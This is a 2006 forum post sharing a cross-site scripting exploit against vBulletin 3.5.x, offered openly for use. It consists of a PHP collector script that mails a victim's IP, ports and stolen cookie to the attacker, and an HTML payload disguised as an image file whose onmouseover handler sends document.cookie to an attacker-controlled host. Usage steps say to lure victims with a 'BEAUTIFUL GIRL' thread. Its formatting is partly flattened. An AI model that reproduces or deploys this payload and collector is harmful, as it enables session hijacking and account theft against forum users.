zolidznake Posted November 30, 2006 Report Posted November 30, 2006 ________________________________________________________________________ / ,, / / '-.`()/`.-' .--_'( )'_--. / /` /`""` ` | | >< | | / / '.__.' => Xss Vbulletin 3.5.x ( test: 3.5.4 )=> Author: SpiderZ => Sito: _________________________________________________________________________('>http://www.spiderz.tk_________________________________________________________________________( 1 )--------------------------------------------------------------------Name file: exploit.php--------------------------------------------------------------------<?php$ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip ?: ',$ip_adresse; } else { echo 'Impossible d'afficher l'IP'; } ?> <?$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;else $visitor_info = $REMOTE_HOST;$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;$x1=`host $REMOTE_ADDR|grep Name`;$x2=$REMOTE_PORT;?><?php $cookie = $_GET['c'];?><?php$myemail = "YOUR ADDRESS E-MAIL";$today = date("l, F j, Y, g:i a") ;$subject = "Xss Vbulletin" ;$message = "Xss: HackingIp: $ip_adresse Cookie: $cookieUrl: $baseporta usata: $xx1remote port: $x2Giorno & Ora : $today n";$from = "From: $myemailrn";mail($myemail, $subject, $message, $from);?>--------------------------------------------------------------------<?php$myemail = "YOUR ADDRESS E-MAIL";--------------------------------------------------------------------( 2 )--------------------------------------------------------------------Name file: image.gif--------------------------------------------------------------------<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >--------------------------------------------------------------------location="http://YOUR ADDRESS WEB.com--------------------------------------------------------------------( 3 )--------------------------------------------------------------------Like Using--------------------------------------------------------------------1? new thread2? BEAUTIFUL GIRL ' 3? Submit4? It waits for-------------------------------------------------------------------- Quote